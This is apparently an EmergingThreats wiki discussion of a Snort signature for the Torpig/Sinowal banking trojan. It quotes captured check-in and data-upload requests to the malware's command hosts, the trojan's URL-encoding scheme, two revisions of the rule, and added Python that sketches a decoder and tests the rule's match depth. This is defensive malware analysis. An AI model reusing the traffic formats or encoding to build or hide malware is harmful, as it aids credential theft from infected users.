EmergingThreats > Main Web > 2003590 (revision 11)
Added 2007-06-22

Ondrej, I'm trying to decrypt the head of the request. Could you explain the encryption method in more detail, especially the part with half-byte shuffling? I know the xor and base64 methods :-). I saw this trojan talking to gjxuunj.com in June. Panda published a paper about this threat: link to eCrime 2007 Congress

-- DamianPetrus? - 22 Jun 2007

Added 2007-06-04

I can decrypt the URL part (after /ewDf/):

the key for decryption is inside user-agent - CEB...91D. The encryption method is based on shuffling half-bytes around the string, xoring with the key and finally base64 encoding.

I don't know how to decrypt the content of the request. But from my observations the amount of data sent corresponds to increments in the file \Windows\temp\$_2341233.tmp (hidden and system) (at least for the version on my computer).

-- OndrejPokorny?
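The encoding chain Ondrej describes above, as an added example (not code from the thread, and not the bot's own routine): the key is pulled out of the MSID field of the User-Agent, and a token is built as shuffle half-bytes, then XOR with the key, then base64 with the padding dropped (the captured URL tokens carry no "="). The page does not say what the half-byte permutation is, so the one here is a stand-in that only marks where a recovered permutation would plug in; whether the key is the 32 hex characters or the 16 bytes they encode is likewise an assumption, flagged in the code. The captured User-Agent and URL token are copied from the thread; the plaintext used for the round trip is constructed.

```python
import base64
import re

# User-Agent format seen in this thread: MSID [<32 hex digits>]|<tag>|<build>
UA_RE = re.compile(r"MSID \[([0-9A-Fa-f]{32})\]\|([^|]*)\|(\d+)")

# From the 2007-05-27 post; CEB...91D is the key Ondrej refers to.
CAPTURED_UA = "MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107"

# URL token after /XFsQa5/ in the 2007-04-23 POST, copied as transcribed on the page.
CAPTURED_TOKEN = (
    "ddL0E2FGExU1EWK+BWaQBZGnc1owNyYU0VLWEuUOwicwF1Gm5QZixjG0UlsA"
    "o0TiBWazPwRWFnQQowcC1BpXVqFHIeYx1ycjBTFTGwBzRCJRknJ/UaMTEEWS"
    "coegbhInYEch5lF2J2R1oVMscCQEQhYCdrtnIGEkQEIHwjUaV0YXUFFmFQVx"
    "43CkA"
)


def key_from_user_agent(ua: str) -> bytes:
    """Pull the MSID field out of the User-Agent and use it as the XOR key."""
    m = UA_RE.search(ua)
    if m is None:
        raise ValueError("no MSID [...] field in User-Agent")
    # ASSUMPTION: the key is the 32 hex characters as they appear in the header.
    # If the bot uses the 16 raw bytes instead, return bytes.fromhex(m.group(1)).
    return m.group(1).encode("ascii")


def shuffle_nibbles(data: bytes) -> bytes:
    """PLACEHOLDER permutation, not the bot's real one: write out all high
    nibbles first, then all low nibbles, and repack them into bytes."""
    nibbles = [b >> 4 for b in data] + [b & 0x0F for b in data]
    return bytes((nibbles[i] << 4) | nibbles[i + 1] for i in range(0, len(nibbles), 2))


def unshuffle_nibbles(data: bytes) -> bytes:
    """Inverse of shuffle_nibbles."""
    nibbles = [n for b in data for n in (b >> 4, b & 0x0F)]
    half = len(nibbles) // 2
    return bytes((hi << 4) | lo for hi, lo in zip(nibbles[:half], nibbles[half:]))


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_token(plaintext: bytes, key: bytes) -> str:
    """Encoder in the order described: shuffle -> XOR -> base64, padding stripped."""
    raw = xor_with_key(shuffle_nibbles(plaintext), key)
    return base64.b64encode(raw).decode("ascii").rstrip("=")


def token_length_is_valid(token: str) -> bool:
    """Unpadded base64 can have any length except len mod 4 == 1."""
    return len(token) % 4 != 1


def decode_token(token: str, key: bytes) -> bytes:
    """Decoder: base64 (standard alphabet, '+' and '/' both occur in the
    captured token) -> XOR -> unshuffle."""
    if not token_length_is_valid(token):
        raise ValueError(f"{len(token)} chars cannot be unpadded base64 (len mod 4 == 1)")
    raw = base64.b64decode(token + "=" * (-len(token) % 4))
    return unshuffle_nibbles(xor_with_key(raw, key))


CAPTURED_KEY = key_from_user_agent(CAPTURED_UA)
```

One check worth running before trying any decode: the token in the 2007-04-23 POST is 185 characters as transcribed here, and 185 mod 4 == 1 is not a possible length for unpadded base64, so at least one character was lost in the paste. Decode work should start from the raw capture, not from the copy on this page.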

Added 2007-05-27

We were able to capture this guy from a web page (drive-by download). It is pushing out these on submission of form data:

Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: lddpaym.net
Content-Length: 999
Connection: Close
User-Agent: MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107
Pragma: no-cache

Content-Disposition: form-data; name=datafile; filename="data.str"
Content-Type: application/octet-stream


Does anybody have an idea of how to get to the content of the submitted data? I already tried base64 decode...


-- ChristianSeifert? - 2007-05-27

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.bleedingthreats.net/2003590; sid:2003590; rev:2;)
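The content test from the signature above, run over sample requests, as an added example (not part of the original page or the ET rule set): it mimics Snort's `content` with `nocase` and `depth`, then parses the MSID/tag/build fields out of a matching User-Agent so they can be logged. The GET request is constructed around the headers in the 2007-04-16 post (its path is assumed); the POST is rebuilt from the lines of the 2007-04-23 capture with CRLF line endings; the browser request is constructed as a negative case.

```python
import re
from typing import Optional, Tuple

# From the rule: content:"User-Agent\: MSID ["; nocase; depth:320;
RULE_CONTENT = b"User-Agent: MSID ["
RULE_DEPTH = 320

# Full User-Agent shape seen in the thread: MSID [<32 hex>]|<tag>|<build>
UA_RE = re.compile(rb"User-Agent: MSID \[([0-9A-Fa-f]{32})\]\|([^|\r\n]*)\|(\d+)", re.IGNORECASE)

# URL token from the 2007-04-23 POST, as transcribed on the page.
TOKEN = (
    b"ddL0E2FGExU1EWK+BWaQBZGnc1owNyYU0VLWEuUOwicwF1Gm5QZixjG0UlsA"
    b"o0TiBWazPwRWFnQQowcC1BpXVqFHIeYx1ycjBTFTGwBzRCJRknJ/UaMTEEWS"
    b"coegbhInYEch5lF2J2R1oVMscCQEQhYCdrtnIGEkQEIHwjUaV0YXUFFmFQVx"
    b"43CkA"
)

# Constructed: the 2007-04-16 post shows only headers, so the request line is assumed.
REQ_GET = b"\r\n".join([
    b"GET / HTTP/1.0",
    b"User-Agent: MSID [6FE60F5FFAF67AB172BAC9A0408E11FC]|sun|104",
    b"Host: xipdarm.com",
    b"Pragma: no-cache",
    b"", b"",
])

# The 2007-04-23 POST, header order as transcribed.
REQ_POST = b"\r\n".join([
    b"POST http://seksis1.com/XFsQa5/" + TOKEN + b" HTTP/1.0",
    b"Content-Type: multipart/form-data; boundary=swefasvqdvwxff",
    b"Host: seksis1.com",
    b"Content-Length: 1254",
    b"User-Agent: MSID [CD256AE062083071BAE834E73A4A694E]|grey|102",
    b"", b"",
])

# Constructed benign request.
REQ_BENIGN = b"\r\n".join([
    b"GET / HTTP/1.1",
    b"Host: www.example.com",
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    b"", b"",
])


def snort_content_match(payload: bytes, content: bytes,
                        depth: Optional[int] = None, nocase: bool = True) -> bool:
    """Mimic Snort 'content': with 'depth' the match must lie entirely within
    the first `depth` bytes of the payload; 'nocase' makes it case-insensitive."""
    window = payload if depth is None else payload[:depth]
    if nocase:
        return content.lower() in window.lower()
    return content in window


def parse_msid_ua(payload: bytes) -> Optional[Tuple[str, str, int]]:
    """Return (msid, tag, build) from the first MSID User-Agent in the payload."""
    m = UA_RE.search(payload)
    if m is None:
        return None
    return (m.group(1).decode("ascii").upper(), m.group(2).decode("latin-1"), int(m.group(3)))


def detect(payload: bytes, depth: Optional[int] = RULE_DEPTH) -> Optional[Tuple[str, str, int]]:
    """Apply the rule's content test, then extract the tracking fields for logging."""
    if not snort_content_match(payload, RULE_CONTENT, depth=depth, nocase=True):
        return None
    return parse_msid_ua(payload)


def header_offset(payload: bytes, name: bytes) -> int:
    """Byte offset at which a header line starts, or -1 if absent."""
    idx = payload.find(b"\r\n" + name + b":")
    return -1 if idx < 0 else idx + 2
```

The short check-in GET fires as expected. The POST is the case to watch: counting the transcribed lines with CRLF endings, its User-Agent header begins at byte 328, past the rule's `depth:320`, because the encoded URL in the request line is over 180 bytes and three headers precede it. Whether this signature sees the data-exfiltration POSTs therefore depends on request-line length and header order, not only on the User-Agent string; the `depth` is worth re-checking against live captures.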

Added 2007-04-23 10:49:18 UTC

I have an infected computer (for research purposes) and have seen two versions of the trojan: grey (old version) and Build Vasi4 (after automatic update):

POST http://seksis1.com/XFsQa5/ddL0E2FGExU1EWK+BWaQBZGnc1owNyYU0VLWEuUOwicwF1Gm5QZixjG0UlsAo0TiBWazPwRWFnQQowcC1BpXVqFHIeYx1ycjBTFTGwBzRCJRknJ/UaMTEEWScoegbhInYEch5lF2J2R1oVMscCQEQhYCdrtnIGEkQEIHwjUaV0YXUFFmFQVx43CkA HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: seksis1.com
Content-Length: 1254
User-Agent: MSID [CD256AE062083071BAE834E73A4A694E]|grey|102


Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Content-Length: 607
User-Agent: MSID [CD256AE062083071BAE834E73A4A694E]|Build Vasi4|104
Pragma: no-cache

The sites contacted have also included jdbpebf.com and seksis1.com (both stopped), and at this moment it is vgnyarm.com (or a numeric IP, if DNS doesn't work). The malware steals user information (IE autocomplete fields, POP3 password, bookmarks, address book, filled forms sent to the internet) and also targets many sites, especially banking sites.

Have you seen other IPs than Do you know anything about the infection? I know the site veslox.net/grey/, but it doesn't work anymore.

-- OndrejPokorny? - 2007-04-23

Added 2007-04-16 13:15:18 UTC

'sun' in the User-Agent most likely refers to the directory which the compromised host visited and from which it was led to the downloader. For example, a directory like /ld/sun/ani.htm would lead to 'sun' being placed in the User-Agent for the GET check-in request. Other possible strings are 'grey', 'ment' and 'guc' (though probably not all-inclusive).

-- JacobKitchel? - 16 Apr 2007

This sig is working well for us. FYI, I've observed the word 'mentat' in the User-Agent following the "]|".

-- BenFeinstein - 19 Apr 2007

Thanks Ben. I bet the mentat, sun, etc. are just tracking for the malware authors. It'll be interesting to see what others show up though.

-- MattJonkman - 19 Apr 2007

This is going to be a widely varied set of targets and malware. The UA comes from the initial infection, which is likely just a loader that knows a DNS name. Tracking them all is relatively futile, I think. Just block the initial load with these UAs and you should contain it.


-- MattJonkman - 23 Apr 2007

The UA is from the active trojan, not from the infection. The initial infection was carried out by different means: through Internet Explorer. It is true, however, that blocking communication with this UA prevents the trojan from obtaining its configuration (which is vital in my case) or sending data to the rogue site.

My previous question about IPs and DNS names was aimed at the possibility of guessing how many groups are using this code.

-- OndrejPokorny? - 24 Apr 2007

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265 Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.bleedingthreats.net/2003590; sid:2003590; rev:1;)

Added 2007-04-16 13:01:18 UTC

Regular downloader, but has an unusual UA and GET string:

User-Agent: MSID [6FE60F5FFAF67AB172BAC9A0408E11FC]|sun|104
Host: xipdarm.com
Pragma: no-cache

-- MattJonkman - 16 Apr 2007

Topic revision: r11 - 2007-06-22 - DamianPetrus?